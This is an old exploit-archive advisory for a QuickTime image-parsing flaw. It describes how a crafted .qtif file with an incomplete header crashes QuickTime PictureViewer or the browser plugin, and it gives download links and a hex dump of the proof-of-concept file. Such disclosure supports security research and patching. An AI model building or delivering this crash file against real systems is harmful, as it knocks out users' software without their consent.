32 lines
No EOL
1.2 KiB
Text
32 lines
No EOL
1.2 KiB
Text
# Added qtif on milw0rm's sploits archive/ /str0ke #
|
|
|
|
Application: QuickTime
|
|
http://www.apple.com/quicktime/
|
|
|
|
AFFECTED VERSION:
|
|
Versions verified to be vulnerable:
|
|
QuickTime.qts (6.5.2.10) and prior versions are affected.
|
|
|
|
The bug:
|
|
The problem specifically exists when QuickTime.qts component parsing
|
|
(.qtif) image files that contain uncompleted header.
|
|
A remote user can create a file that when processed by QuickTime PictureViewer or via browser,
|
|
will can cause the remote system to crash.
|
|
|
|
--Uncompleted qtif image file header
|
|
http://www.atmacasoft.com/exp/vuln.qtif.zip
|
|
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/770.qtif (vuln.qtif)
|
|
|
|
00000000 0000 005E 6964 7363 0000 0056 6A70 6567 0000 0000 0000 0000 0000 0000 ...^idsc...Vjpeg............
|
|
0000001C 6170 706C 0000 0000 0000 0200 0100 016D 0048 0000 0048 0000 0000 724D appl...........m.H...H....rM
|
|
00000038 0001 0C50 686F 746F 202D 204A 5045 4700 0000 0000 0000 0000 0000 0000 ...Photo - JPEG.............
|
|
00000054 0000 0000 0000 0018 FFFF 0000 7255 6964 6174 FFD8 FFE0 0010 ............rUidat......
|
|
|
|
VENDOR RESPONSE:
|
|
No vendor response.
|
|
|
|
Discoveried By ATmaCA
|
|
AtmacaSoft Inc.
|
|
http://www.atmacasoft.com
|
|
|
|
# milw0rm.com [2005-01-24] |